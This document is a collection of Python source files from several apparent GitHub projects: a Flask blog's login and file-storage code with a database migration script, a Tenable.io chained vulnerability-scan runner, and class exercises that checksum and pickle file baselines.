# lambda: self.assertLength(value, 5, 20, "密码长度必须大于等于5")
# ]
# self.assertOr(funcs, "用户名错误")
# self.assertAnd(funcs, "用户名错误1")
# assertion = UserAssert({"username": "username", "password": "<PASSWORD>"})()
```
#### File: App/extension/login.py
```python
from flask_login import LoginManager, login_user
from flask_babel import lazy_gettext as _
from flask_maple.response import HTTP
login_manager = LoginManager()
@login_manager.user_loader
def user_loader(id):
from maple.model import User
return User.query.get(int(id))
@login_manager.request_loader
def request_loader(request):
from maple.model import User
token = request.headers.get('Maple-Token', request.args.get('maple_token'))
user = None
if token:
user = User.check_token(token)
if not user:
return
user.login(True)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
return HTTP.UNAUTHORIZED()
def init_app(app):
# login_manager.login_view = "auth.login"
login_manager.session_protection = "basic"
login_manager.login_message = _("Please login to access this page.")
login_manager.init_app(app)
```
#### File: App/extension/maple.py
```python
from flask_maple.bootstrap import Bootstrap
from flask_maple.captcha import Captcha
from flask_maple.error import Error
from flask_maple.app import App
from flask_maple.json import CustomJSONEncoder
from flask_maple.middleware import Middleware
from flask_maple.log import Logging
def init_app(app):
Bootstrap(
app,
css=(
'css/base.css', 'css/main.css', 'css/monokai.css', 'css/lib.css',
'css/timeline.css', 'css/night.css'),
js=('js/main.js', 'js/highlight.js', 'js/night.js'),
auth=False)
Captcha(app)
Error(app)
App(app, json=CustomJSONEncoder)
Middleware(app)
Logging(app)
```
#### File: Blog/App/__init__.py
```python
from flask import Flask
from maple import extension, router, jinja, admin, alias, api
from werkzeug import import_string
import os
def create_app(config):
templates = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, 'templates'))
static = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, 'static'))
app = Flask(__name__, template_folder=templates, static_folder=static)
app.config.from_object(config)
app.url_map.redirect_defaults = False
extension.init_app(app)
jinja.init_app(app)
admin.init_app(app)
router.init_app(app)
api.init_app(app)
alias.init_app(app)
apps = ["maple.blog", "maple.storage", "maple.tool"]
[import_string(i).init_app(app) for i in apps]
return app
```
#### File: App/storage/db.py
```python
import os
from flask_maple.models import ModelTimeMixin, ModelUserMixin
from flask import url_for
from maple.extension import db
from sqlalchemy import event
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm.attributes import get_history
from werkzeug.utils import secure_filename
from . import config
class Bucket(ModelUserMixin, db.Model):
__tablename__ = 'bucket'
name = db.Column(db.String(108), nullable=False, unique=True)
description = db.Column(db.String(1024), default='default')
def get_root_path(self, path, create=False):
filepath = self.rootpath
for name in path.split("/"):
if name == "":
continue
childpath = filepath.child_paths.filter_by(
name=name,
bucket_id=self.id,
).first()
if not childpath and not create:
return
if not childpath and create:
childpath = FilePath(
name=name,
bucket_id=self.id,
parent_id=filepath.id,
)
childpath.save()
filepath = childpath
return filepath
@property
def rootpath(self):
filepath = self.paths.filter_by(name="/").first()
if not filepath:
filepath = FilePath(name="/", bucket_id=self.id)
filepath.save()
return filepath
@property
def abspath(self):
return os.path.join(config.UPLOAD_FOLDER, self.name)
@property
def relpath(self):
return os.path.join(self.name)
def __repr__(self):
return '<Bucket %r>' % self.name
def __str__(self):
return self.name
class FilePath(ModelTimeMixin, db.Model):
__tablename__ = 'filepath'
name = db.Column(db.String(108), nullable=False, default="/")
bucket_id = db.Column(
db.Integer,
db.ForeignKey('bucket.id', ondelete="CASCADE"),
nullable=False)
bucket = db.relationship(
Bucket,
backref=db.backref(
'paths',
cascade='all,delete-orphan',
lazy='dynamic',
),
lazy='joined',
uselist=False)
parent_id = db.Column(
db.Integer,
db.ForeignKey('filepath.id', ondelete="CASCADE"),
)
@property
def size(self):
size = sum(
[
i[0] for i in db.session.query(File.size).filter_by(
path_id=self.id)
])
return size + sum([i.size for i in self.child_paths])
@declared_attr
def parent_path(cls):
return db.relationship(
'FilePath',
remote_side=[cls.id],
backref=db.backref(
'child_paths',
remote_side=[cls.parent_id],
cascade='all,delete-orphan',
lazy='dynamic'),
lazy='joined',
uselist=False)
@property
def abspath(self):
if self.is_root_path:
return self.bucket.abspath
return os.path.join(
self.parent_path.abspath,
self.name,
)
@property
def relpath(self):
if self.is_root_path:
return self.bucket.relpath
return os.path.join(
self.parent_path.relpath,
self.name,
)
@property
def fullname(self):
if self.is_root_path:
return "/"
return os.path.join(
self.parent_path.fullname,
self.name,
)
@property
def is_root_path(self):
return self.name == "/" and not self.parent_id
@property
def is_dir(self):
return True
def rename(self, newname):
newname = secure_filename(newname)
self.name = newname
self.save()
return self
def move(self, newpath):
filepath = newpath.child_paths.filter_by(name=self.name).first()
if not filepath:
self.parent_id = newpath.id
self.save()
return self
for fp in self.child_paths:
fp.move(filepath)
for f in self.files:
f.move(filepath)
self.delete()
return filepath
def copy(self, newpath):
# TODO: 性能优化
filepath = newpath.child_paths.filter_by(name=self.name).first()
if not filepath:
filepath = FilePath(
name=self.name,
bucket_id=self.bucket_id,
parent_id=newpath.id,
)
filepath.save()
for fp in self.child_paths:
fp.copy(filepath)
for f in self.files:
f.copy(filepath)
return filepath
def __str__(self):
if self.is_root_path:
return self.name
return os.path.join(
self.parent_path.__str__(),
self.name,
)
class File(ModelTimeMixin, db.Model):
__tablename__ = 'file'
FILE_TYPE = ("IMAGE", "CSS", "JS")
FILE_IMAGE = "IMAGE"
name = db.Column(db.String(108), nullable=False)
file_type = db.Column(db.String(108), nullable=False)
hash = db.Column(db.String(1024), nullable=False)
size = db.Column(db.Integer, nullable=False, default=0)
path_id = db.Column(
db.Integer,
db.ForeignKey('filepath.id', ondelete="CASCADE"),
nullable=False)
path = db.relationship(
FilePath,
backref=db.backref(
'files', cascade='all,delete-orphan', lazy='dynamic'),
lazy='joined',
uselist=False)
@property
def abspath(self):
return os.path.join(
self.path.abspath,
self.name,
)
@property
def relpath(self):
return os.path.join(
self.path.relpath,
self.name,
)
@property
def url(self):
args = dict(filename=self.relpath, _external=True)
if config.HTTPS:
args.update(**dict(_scheme="https"))
if self.file_type.startswith("image"):
args.update(type="mini")
return url_for("storage.show", **args)
@property
def is_dir(self):
return False
def save(self):
self.name = self.name.strip("/")
if "/" in self.name:
s = self.name.split("/")
filepath = FilePath.query.filter_by(id=self.path_id).first()
filepath = filepath.bucket.get_root_path("/".join(s[:-1]), True)
self.name = s[-1]
self.path_id = filepath.id
return super(File, self).save()
def copy(self, newpath):
f = File(
name=self.name,
file_type=self.file_type,
hash=self.hash,
path_id=newpath.id,
)
f.save()
return f
def move(self, newpath):
self.path_id = newpath
self.save()
return self
def rename(self, newname):
newname = secure_filename(newname)
self.name = newname
self.save()
return self
def __repr__(self):
return '<File %r>' % self.name
def __str__(self):
return self.name
@event.listens_for(Bucket, 'after_update')
def bucket_update_listen(mapper, connection, target):
oldname = target.name
newname = target.name
history = get_history(target, "name")
if history.added and history.deleted:
oldname = history.deleted[0]
newname = history.added[0]
oldpath = os.path.join(
config.UPLOAD_FOLDER,
oldname,
)
newpath = os.path.join(
config.UPLOAD_FOLDER,
newname,
)
if oldpath != newpath and os.path.exists(oldpath):
os.rename(oldpath, newpath)
@event.listens_for(Bucket, 'after_delete')
def bucket_delete_listen(mapper, connection, target):
filepath = target.abspath
if os.path.exists(filepath):
os.rmdir(filepath)
@event.listens_for(FilePath, 'after_update')
def filepath_update_listen(mapper, connection, target):
change = {
"name": (target.name, target.name),
"bucket": (target.bucket, target.bucket)
}
history = get_history(target, "bucket")
if history.added and history.deleted:
change["bucket"] = (history.deleted[0], history.added[0])
history = get_history(target, "name")
if history.added and history.deleted:
change["name"] = (history.deleted[0], history.added[0])
oldpath = os.path.join(
change["bucket"][0].abspath,
change["name"][0],
)
newpath = os.path.join(
change["bucket"][1].abspath,
change["name"][1],
)
if oldpath != newpath and os.path.exists(oldpath):
os.rename(oldpath, newpath)
@event.listens_for(File, 'after_update')
def file_update_listen(mapper, connection, target):
change = {
"name": (target.name, target.name),
"path": (target.path, target.path),
"hash": (target.hash, target.hash),
}
history = get_history(target, "hash")
if history.added and history.deleted:
change["hash"] = (history.deleted[0], history.added[0])
history = get_history(target, "name")
if history.added and history.deleted:
change["name"] = (history.deleted[0], history.added[0])
history = get_history(target, "path")
if history.added and history.deleted:
change["path"] = (history.deleted[0], history.added[0])
oldpath = os.path.join(
change["path"][0].abspath,
change["name"][0],
)
newpath = os.path.join(
change["path"][1].abspath,
change["name"][1],
)
file_change = change["hash"][0] != change["hash"][1]
filepath_change = oldpath != newpath and os.path.exists(oldpath)
if file_change and filepath_change:
os.remove(oldpath)
if not file_change and filepath_change:
dirname = os.path.dirname(newpath)
if not os.path.exists(dirname):
os.makedirs(dirname)
os.rename(oldpath, newpath)
dirname = os.path.dirname(oldpath)
if not os.listdir(dirname):
os.rmdir(dirname)
@event.listens_for(File, 'after_delete')
def file_delete_listen(mapper, connection, target):
filepath = target.abspath
if os.path.exists(filepath):
os.remove(filepath)
dirname = os.path.dirname(filepath)
if os.path.exists(dirname) and not os.listdir(dirname):
os.rmdir(dirname)
```
#### File: App/storage/router.py
```python
import os
from datetime import datetime as dt
from datetime import timedelta
from flask import abort, make_response, request, send_from_directory
from maple.utils import MethodView
from . import config
from .util import file_is_image, gen_thumb_image, referer_is_block
class FileShowView(MethodView):
cache_time = 3600
def render_image(self, filename):
'''
默认设置为webp, 减少传输大小
'''
typ = request.args.get("type")
width = request.args.get("width", 0, type=int)
height = request.args.get("height", 0, type=int)
if typ == "iloveyou": # 哈哈
return send_from_directory(config.UPLOAD_FOLDER, filename)
if typ == "mini":
width, height = 120, 0
elif typ == "small":
width, height = 360, 0
elif typ == "thumb":
width, height = 600, 0
elif typ == "show":
width, height = 960, 0
elif width == height == 0:
width, height = 960, 0
img = os.path.join(config.UPLOAD_FOLDER, filename)
stream = gen_thumb_image(img, width, height)
buf_value = stream.getvalue()
response = make_response(buf_value)
max_age = 30 * 3600 * 24
response.mimetype = "image/webp"
# 不要设置last_modified, 避免浏览器与服务端多一次交互
# response.last_modified = os.path.getmtime(img)
response.expires = dt.utcnow() + timedelta(seconds=max_age)
# response.cache_control.public = True
response.cache_control.max_age = max_age
response.add_etag()
return response.make_conditional(request)
def get(self, filename):
if referer_is_block(request):
abort(403)
if not os.path.exists(os.path.join(config.UPLOAD_FOLDER, filename)):
abort(404)
if file_is_image(filename):
return self.render_image(filename)
return send_from_directory(config.UPLOAD_FOLDER, filename)
```
#### File: static/script/upgrade.py
```python
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import sys
import os
sys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))
from runserver import app
from maple.extension import db, redis
from maple.model import (Blog, Tag, Category, User, TimeLine, Question,
tag_blog)
engine = create_engine('postgresql://postgres:password@localhost/blog_backup')
session = sessionmaker(bind=engine)()
def date(i):
return {"created_at": i.created_at, "updated_at": i.updated_at}
def upgrade_user():
print('upgrade user ...')
users = session.execute('select * from users;')
User.bulk_save([User(
id=user.id,
username=user.username,
email=user.email,
password=<PASSWORD>,
is_superuser=user.is_superuser,
is_confirmed=user.is_confirmed) for user in users])
def upgrade_timeline():
print('upgrade timeline ...')
timelines = session.execute('select * from timeline;')
Tag.bulk_save([TimeLine(
id=i.id,
content=i.content,
is_hidden=i.hide,
user_id=i.author_id,
**date(i)) for i in timelines])
def upgrade_question():
print('upgrade question ...')
questions = session.execute('select * from questions;')
Question.bulk_save([Question(
id=i.id,
title=i.title,
is_hidden=i.is_private,
answer=i.answer,
description=i.describ,
user_id=i.author_id,
created_at=i.created_at) for i in questions])
def upgrade_blog():
print('upgrade tag ...')
tags = session.execute('select * from tags;')
Tag.bulk_save([Tag(id=i.id, name=i.name) for i in tags])
print('upgrade category ...')
categories = session.execute('select * from categories;')
Category.bulk_save([Category(id=i.id, name=i.name) for i in categories])
print('upgrade blog ...')
blogs = session.execute('select * from blogs;')
Blog.bulk_save([Blog(
id=blog.id,
title=blog.title,
content=blog.content,
content_type=blog.content_type,
is_copy=blog.is_copy,
category_id=blog.category_id,
user_id=blog.author_id,
**date(blog)) for blog in blogs])
print('upgrade tag_blog ...')
tag_blogs = session.execute('select * from tag_blog;')
db.engine.execute(tag_blog.insert(), [{
'tag_id': i.tags_id,
'blog_id': i.blogs_id
} for i in tag_blogs])
def upgrade_setval():
print('upgrade setval ...')
db.engine.execute("select setval('tag_id_seq',(select max(id) from tag))")
db.engine.execute(
"select setval('blog_id_seq',(select max(id) from blog))")
db.engine.execute(
"select setval('category_id_seq',(select max(id) from category))")
db.engine.execute(
"select setval('timeline_id_seq',(select max(id) from timeline))")
db.engine.execute(
"select setval('question_id_seq',(select max(id) from question))")
db.engine.execute(
"select setval('user_id_seq',(select max(id) from \"user\"))")
def upgrade_redis():
print("upgrade redis ...")
redis.rename("visited:article", "count:article:visited")
if __name__ == '__main__':
with app.app_context():
upgrade_user()
upgrade_blog()
upgrade_timeline()
upgrade_question()
upgrade_setval()
upgrade_redis()
```
|
{
"source": "jeff-a-holland-codecov/Chain.py-Tenable-IO-Chained-Scanning-Application",
"score": 2
}
|
#### File: Chain.py-Tenable-IO-Chained-Scanning-Application/chain/chain.py
```python
import argparse
import textwrap
import os
from dotenv import load_dotenv
# Argparse and dotenv documentation:
# - https://docs.python.org/2/library/argparse.html
# - https://pypi.org/project/python-dotenv/
# Function to chmod log files 600 (rw for owner only once data has been
# written to the log file.
def fix_perms(filepath):
"""Function for file permission changes"""
file_status = str(os.path.exists(filepath))
if file_status == 'True':
os.chmod(filepath, 0o600)
# End of Function
# Main function
def main():
"""Main function in chain.py"""
### Check for existence of .env file in local directory. If not there,
### exit.
file_status = str(os.path.exists('.env'))
if file_status != 'True':
print ('\n The .env file does not exist. Create this file and ' \
'poplulate it with your API keys per the README.\n')
print ('Exiting...\n')
exit()
### Load Tenable IO API keys from the .env file stored in the current
### directory. Make sure you chmod the file 600 to protect it, and
### assign ownership as necessary. A check below will set the perms to
### 600 if it's not already. Note this check does not run if using the
### -h/--help flag. It only works with create/delete/run args.
### Format of the .env is:
# ACCESS_KEY=<access key goes here>
# SECRET_KEY=<secret key goe shere>
###
load_dotenv()
access_key = os.getenv('ACCESS_KEY')
secret_key = os.getenv('SECRET_KEY')
### Check for blank API keys or the stub value in the .env file
if access_key == '' or secret_key == '' or \
access_key == '<access_key>' or secret_key == '<secret_key>':
print ('\n One or more API keys were not declared in the .env file ' \
' properly.')
print (' Exiting...\n')
exit()
###Configure command line options using argparse
parser = argparse.ArgumentParser(formatter_class=\
argparse.RawTextHelpFormatter)
parser.add_argument('--action', choices=['create', 'run', 'delete',
'create-run', 'delete-create',
'delete-create-run', 'info'],
help=textwrap.dedent('''
NOTES:
- You cannot delete and then run scans (delete-run), nor create and
then delete scans (create-delete). Similarly, create-delete-run is
not supported.
- The "info" flag will output the folder, scanner, policy, and tag
name:ID dictionaries to log.info to assist in buildiling scan
definitions in the scans.ini file. Run "./chain.py --action info"
to geneate this log. The data is also sent to STDOUT, however
it is easier to search/grep from the log.info flat file.
- The create/delete/run scripts all log to log.chain in the logs
subdirectory. The log file is set to rotate when the size reaches
100K bytes, and keeps a history of 5 log files (log.chain.5 being
the oldest and log.chain being the current). Successive
instantiations of the run.py script will also log to log.chain.
The script name is in the log.chain file, such as "create.py" in
the second field (fields delimited by double-colons). Note that
the log.info file is cleared on every run of the
create/delete/run scripts. This is fine as this data is mutable
and should be queried every time a scan in scans.ini is configured
or updated.
'''))
args = parser.parse_args()
# Test to see if logs subdir exists, and if not, create/chmod it
if not os.path.exists('logs'):
os.makedirs('logs')
os.chmod('logs', 0o700)
# Test if .env file exists, and if so, chmod it. This file contains
# your API keys, so needs to be secured as much as file permissions
# allow. Note this check is not executed when using the -h/--help
# argument. These perms should alrady be 600, but double checking.
fix_perms('./.env')
# Check for --action arguments. Will import
# necessary .py scripts to create .pyc bytecode
# files. Also run fix_perms function to chmod file.
if args.action == 'create':
import info
info.main(access_key, secret_key)
import create
create.main(access_key, secret_key, info.folder_dict, \
info.scanner_dict, info.policies_dict, info.tag_dict)
fix_perms('./logs/log.chain')
elif args.action == 'run':
import run
run.main(access_key, secret_key)
fix_perms('./logs/log.chain')
elif args.action == 'delete':
import delete
delete.main(access_key, secret_key)
fix_perms('./logs/log.chain')
elif args.action == 'create-run':
import info
info.main(access_key, secret_key)
import create
create.main(access_key, secret_key, info.folder_dict, \
info.scanner_dict, info.policies_dict, info.tag_dict)
import run
run.main(access_key, secret_key)
fix_perms('./logs/log.chain')
elif args.action == 'delete-create':
import delete
delete.main(access_key, secret_key)
import info
info.main(access_key, secret_key)
import create
create.main(access_key, secret_key, info.folder_dict, \
info.scanner_dict, info.policies_dict, info.tag_dict)
fix_perms('./logs/log.chain')
elif args.action == 'delete-create-run':
import delete
delete.main(access_key, secret_key)
import info
info.main(access_key, secret_key)
import create
create.main(access_key, secret_key, info.folder_dict, \
info.scanner_dict, info.policies_dict, info.tag_dict)
import run
run.main(access_key, secret_key)
fix_perms('./logs/log.chain')
elif args.action == 'info':
import info
info.main(access_key, secret_key)
fix_perms('./logs/log.info')
else:
print ('\n ERROR. No arguments supplied when runing the chain.py script.')
print (' Run "./chain.py --help" to see usage info.\n')
print (' Exiting...\n')
exit()
if __name__ == '__main__':
main()
```
#### File: Chain.py-Tenable-IO-Chained-Scanning-Application/chain/run.py
```python
import json
import sys
import time
import configparser
import logging
from logging.config import fileConfig
import requests
# Print info to log.chain in ./logs subdir, as well as to STDOUT
# See logging.ini for logging configuration
# See:
# https://docs.python-guide.org/writing/logging
# https://www.machinelearningplus.com/python/python-logging-guide
# https://docs.python.org/2.4/lib/logging-config-fileformat.html
fileConfig('logging.ini')
logger = logging.getLogger('run')
# Local vars
chained_scan_names_in_order_list = []
scan_name_list = []
scan_id_dict = {}
chained_scan_id_list = []
scan_status = ''
previous_scan_history_list = []
# Function to get scan names
def get_scan_names():
"""Get scan names from IO"""
#Vars are defined in the scans.ini file
#Parse them for each scan
config = configparser.ConfigParser()
config.read('scans.ini')
config_scans_list = config.sections()
try:
for section in config_scans_list:
scan_name = config.get(section, 'scan_name')
chained_scan_names_in_order_list.append(scan_name)
except:
error = sys.exc_info()[0]
logger.info('ERROR: Scan definition in scans.ini is not configured' \
' properly')
logger.info(f'ERROR: {error}')
logger.info('Exiting...')
exit()
# End of function
# Function to run scan
def run_scan(scan_id, headers):
"""Run scans defined in scans.ini config file"""
try:
url = f"https://cloud.tenable.com/scans/{scan_id}/launch"
response = requests.request("POST", url, headers=headers)
response.raise_for_status()
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
# End function
# Funtion to check scan status
def check_scan_status(scan_id, scan_status, headers):
"""Check status of scan by polling API every 30sec"""
logger.info('Function check_scan_status has been called')
while scan_status == 'running' or scan_status == 'pending' or \
scan_status == 'None':
url = f"https://cloud.tenable.com/scans/{scan_id}"
try:
response = requests.request("GET", url, headers=headers)
pretty_json = json.loads(response.text)
data3 = (json.dumps(pretty_json, indent=2))
data_dict3 = json.loads(data3)
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
# Don't need a condition for 'None' as scan status is now either
# pending, running, or completed
if data_dict3['history'][0].values() and \
(data_dict3['history'][0]['status'] == 'running' or \
data_dict3['history'][0]['status'] == 'pending'):
logger.info(f'Scan ID {scan_id} still running')
# Sleep 30sec between successive API calls
time.sleep(30)
elif data_dict3['history'][0].values() and \
data_dict3['history'][0]['status'] == 'completed':
logger.info(f'Scan completed for scan ID {scan_id}')
scan_status = 'completed'
logger.info('Function check_scan_status processing has completed')
# End of function
# main function
def main(access_key, secret_key):
"""Main function for run.py script"""
logger.info(' Running the run.py script')
# Global vars
global history_cntr
global headers
headers = {
'accept': "application/json",
'content-type': "application/json",
'x-apikeys': f"accessKey={access_key};secretKey={secret_key}"}
# Set history counter for use in preventing clobbering of
# past instansiation of scans with a new one
history_cntr = 0
# Call function to get scan names from scans.ini file
get_scan_names()
# Get list of scans
try:
url = "https://cloud.tenable.com/scans"
response = requests.request("GET", url, headers=headers)
pretty_json = json.loads(response.text)
data = (json.dumps(pretty_json, indent=2))
data_dict = json.loads(data)
length = len(data_dict['scans'])
response.raise_for_status()
logger.info(f'Number of total scans in IO instance is: {length}')
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
# Beginning of the section that runs scans
logger.info('Running the following scans in a chained manner,' \
' in the following top-down order, one at at time:')
for scan in chained_scan_names_in_order_list:
logger.info(f'{scan}')
# Check if at least two scans are defined in scans.ini as we're doing
# chained scanning. If not, exit. We can't run scans that don't exist.
if chained_scan_names_in_order_list == '' or \
len(chained_scan_names_in_order_list) == 1:
logger.info('ERROR: At least two scans must be defined in scans.ini')
logger.info('Exiting...')
exit()
cntr = 0
for scan in data_dict['scans']:
scan_id = data_dict['scans'][cntr]['id']
scan_name = data_dict['scans'][cntr]['name']
cntr += 1
scan_id_dict[scan_name] = scan_id
# Counter to see when a scan is defined in scans.ini file
# but not in IO. This counter should stay 0 if all is well.
scans_ini_scans_dict_cntr = 0
#for key, value in scan_id_dict.iteritems():
for key, value in scan_id_dict.items():
for scan in chained_scan_names_in_order_list:
if scan not in scan_id_dict:
scans_ini_scans_dict_cntr += 1
if key == scan:
value = int(value)
chained_scan_id_list.append(value)
# Check if we have the same number of scans in scans.ini as in the
# scans_id_dict dictionary. If not, we're trying to run one or more
# scans that do not exist in IO. Hence, exit.
# If not, exit. We can't run scans that don't exist.
if scans_ini_scans_dict_cntr > 0:
logger.info('ERROR: One or more scans defined in scans.ini do not' \
' exist in IO')
logger.info('Exiting...')
exit()
list_as_str = str(chained_scan_id_list)
logger.info('List of scan ID\'s that will run in order, one at at' \
f' time: {list_as_str}')
# Populate previous_scan_history_list so we can check later if a second
# instantiation of the scripts still has any scans running
for scan_id in chained_scan_id_list:
try:
url = f"https://cloud.tenable.com/scans/{scan_id}"
response = requests.request("GET", url, headers=headers)
pretty_json = json.loads(response.text)
data2 = (json.dumps(pretty_json, indent=2))
data_dict2 = json.loads(data2)
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
if data_dict2['history'] != []:
previous_scan_history_list.append( \
data_dict2['history'][0]['status'])
# Iterate over the chained_scan_id_list again, this time using
# the list previous_scan_history_list built above
for scan_id in chained_scan_id_list:
try:
url = f"https://cloud.tenable.com/scans/{scan_id}"
response = requests.request("GET", url, headers=headers)
pretty_json = json.loads(response.text)
data4 = (json.dumps(pretty_json, indent=2))
data_dict4 = json.loads(data4)
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
if data_dict4['history'] != []:
dict_val_as_str = str(data_dict4['history'][0]['status'])
logger.info(f'History status for scan_id {scan_id} is:' \
f'{dict_val_as_str}')
# Let's check if a previous instantiation of the scripts
# still has any scans running. If so, exit.
# This check only gets run when all scans have a 'completed'
# history status, and it's the first time this if statement
# is evaluated
history_list_as_str = str(previous_scan_history_list)
logger.info('previous_scan_history_list BEFORE historical run' \
f' check is: {history_list_as_str}')
if data_dict4['history'] != [] and \
data_dict4['history'][0].values() and \
history_cntr == 0 and \
('running' in previous_scan_history_list or \
'pending' in previous_scan_history_list):
logger.info(f'Scan for ID {scan_id} is pending, already running ' \
'or a second instantiation of this script is' \
' trying to run before the previous one finished')
history_list_as_str = str(previous_scan_history_list)
logger.info('previous_scan_history_list AFTER historical' \
f' run check is: {history_list_as_str}')
logger.info(' Exiting....')
exit()
if data_dict4['history'] == []:
#Call function to run scan using scan_id
run_scan(scan_id, headers)
logger.info('NOTE: Null scan history')
logger.info(f'Running scan for ID {scan_id} for the first time')
# Increment history as no scans in the chain were running
history_cntr += 1
# Scan has never run before, so hardcode status.
# It gets updated in the check_scan_status function.
scan_status = 'None'
# Call check_scan_status function, which will wait for a
# run_status of 'complete' before returning
check_scan_status(scan_id, scan_status, headers)
elif data_dict4['history'][0].values() and \
data_dict4['history'][0]['status'] == 'completed':
# Call function to run scan using scan_id
run_scan(scan_id, headers)
logger.info(f'Scan for ID {scan_id} has run previously and '\
'Completed. Will run again now.')
# Increment history as no scans in the chain were running
history_cntr += 1
# Scan has run before, but completed. Run it again and
# hardcode status to pending.
# It gets updated in the check_scan_status function.
scan_status = 'pending'
# Add scan_id to previous_scan_history_list
previous_scan_history_list.append(scan_id)
# Call check_scan_status function, which will wait for a
# run_status of 'complete' before returning
check_scan_status(scan_id, scan_status, headers)
else:
logger.info('ERROR. Exiting....')
exit()
logger.info('Scan execution/running finished successfully.')
print (' See "log.chain" in the logs subdirectory for script output\n')
if __name__ == '__main__':
print ('\n Do not execute this script directly.')
print (' Instead, execute chain.py using an argument.')
print (' Run the command "./chain.py --help" to see usage info.\n')
print (' Exiting...\n')
exit()
```
|
{
"source": "jeff-a-holland/python_class_2021_B2",
"score": 3
}
|
#### File: python_class_2021_B2/exercise_11/solution.py
```python
import os
import hashlib
import pickle
from datetime import datetime
class FileInfo(object):
"""FileInfo class to create object with list of dictionaries"""
object_list = []
def __init__(self, test_dir):
self.test_dir = test_dir
def get_file_info(self):
self.filename = ''
self.timestamp = ''
self.sha1 = ''
for file in os.listdir(self.test_dir):
file_path = os.path.join(self.test_dir, file)
if os.path.isfile(file_path) and not file_path.endswith('FileList'):
# Compute timestamp of when file as last changed (in local time)
self.filename = file_path
mtime = os.stat(file_path).st_mtime
self.timestamp = datetime.fromtimestamp(mtime) \
.strftime('%Y-%m-%d-%H:%M')
# Compute sha1 hash of file, reading in 2^16 bytes at a time in
# binary mode in case the file is too large for memory
sha1sum = hashlib.sha1()
with open(file_path, 'rb') as source:
block = source.read(2**16)
while len(block) != 0:
sha1sum.update(block)
block = source.read(2**16)
self.sha1 = sha1sum.hexdigest()
FileInfo.object_list.append({'filename': self.filename,
'timestamp': self.timestamp,
'sha1': self.sha1})
class FileList(FileInfo):
"""FileList class that subclasses FileInfo to determine if any files were
changed, removed, or added (based on existence or sha1 hash value). Any files
that remain unchanged will not be reported upon."""
pickle_list = []
pickled_obj = b''
def scan(self):
for d in FileInfo.object_list:
fullfilepath = (d['filename'])
filedir = os.path.dirname(d['filename'])
filename = os.path.basename(d['filename'])
timechanged = (d['timestamp'])
sha1 = (d['sha1'])
timeaccessed = datetime.now().strftime('%Y-%m-%d-%H:%M')
info_dict = {'fullfilepath': fullfilepath, 'filedir': filedir,
'filename': filename, 'timechanged': timechanged,
'sha1': sha1, 'timeaccessed': timeaccessed}
FileList.pickle_list.append(info_dict)
FileList.pickled_obj = pickle.dumps(FileList.pickle_list)
filelist_fullpath = self.test_dir + 'FileList'
if os.path.isfile(filelist_fullpath) == False:
print('\n################################################################')
print('Pickled file does not exist. Creating pickle file "FileList" in:')
print('################################################################')
print('\n', self.test_dir)
with open(filelist_fullpath, 'wb') as fh:
fh.write(FileList.pickled_obj)
else:
print('\n######################################')
print('Pickle file "FileList" already exists.')
print('######################################')
print('Skipping creation...')
def rescan(self):
filelist_fullpath = self.test_dir + 'FileList'
with open(filelist_fullpath, 'rb') as fh:
data = fh.read()
unpickled_object = pickle.loads(data)
print('\n#####################################################')
print('Pickled file "FileList" contents after unpickling is:')
print('#####################################################\n')
print(unpickled_object, '\n')
pickled_files_list = []
disk_files_list = []
results_dict = {}
changed_list = []
added_list = []
removed_list = []
print('###############################################################'
'######################')
print('File changes detected since initial file checksum and pickled '
'file baseline creation:')
print('###############################################################'
'######################\n')
for d in unpickled_object:
fullfilepath_orig = d['fullfilepath']
pickled_files_list.append(fullfilepath_orig)
for file in os.listdir(self.test_dir):
fullfilepath_new = os.path.join(self.test_dir, file)
if os.path.isfile(fullfilepath_new) and not fullfilepath_new.endswith('FileList'):
disk_files_list.append(fullfilepath_new)
sha1_new = hashlib.sha1(open(fullfilepath_new, 'rb').read()).hexdigest()
if fullfilepath_orig == fullfilepath_new and \
d['sha1'] == sha1_new:
print(f'exiting file "{fullfilepath_orig}" unchanged')
elif fullfilepath_orig == fullfilepath_new and \
d['sha1'] != sha1_new:
changed_list.append(fullfilepath_orig)
print(f'existing file "{fullfilepath_orig}" CHANGED')
for file in pickled_files_list:
if file not in disk_files_list:
removed_list.append(file)
print(f'previous file "{file}" was REMOVED')
break
for file in disk_files_list:
if file not in pickled_files_list:
added_list.append(file)
print(f'new file "{file}" was ADDED')
break
results_dict = {'added': added_list, 'removed': removed_list, 'changed': changed_list}
print('\n######################################')
print('results_dict with all file changes is:')
print('######################################\n')
print(results_dict, '\n')
return results_dict
def main():
# Testing directory. Modify as necessary.
test_dir = '/Users/jeff/Documents/GitHub/python_class_2021_B2/exercise_11/'
fi = FileInfo(test_dir)
fi.get_file_info()
fl = FileList(test_dir)
fl.scan()
fl.rescan()
if __name__ == '__main__':
main()
```
#### File: python_class_2021_B2/exercise_13/solution.py
```python
import os
import json
import hashlib
import pickle
from datetime import datetime
from flask import Flask, request
app = Flask(__name__)
def check_dir(directory):
"""Make sure directory given as an argument in the URL ends in '/'"""
if not directory.endswith('/'):
directory += '/'
return directory
class FileInfo(object):
"""FileInfo class to create object with list of dictionaries"""
object_list = []
pickle_file_status = ''
def __init__(self, return_list, directory):
self.directory = directory
self.return_list = return_list
self.file_list = self.return_list
self.target_dir = self.directory
def get_file_info(self):
"""Get the file info from the pickled hash database"""
self.filename = ''
self.timestamp = ''
self.sha1 = ''
for file in self.file_list:
# Compute timestamp of when file as last changed (in local time)
self.filename = file
mtime = os.stat(file).st_mtime
self.timestamp = datetime.fromtimestamp(mtime) \
.strftime('%Y-%m-%d-%H:%M')
# Compute sha1 hash of file, reading in 2^16 bytes at a time in
# binary mode in case the file is too large for memory
sha1sum = hashlib.sha1()
with open(file, 'rb') as source:
block = source.read(2**16)
while len(block) != 0:
sha1sum.update(block)
block = source.read(2**16)
self.sha1 = sha1sum.hexdigest()
FileInfo.object_list.append({'filename': self.filename,
'timestamp': self.timestamp,
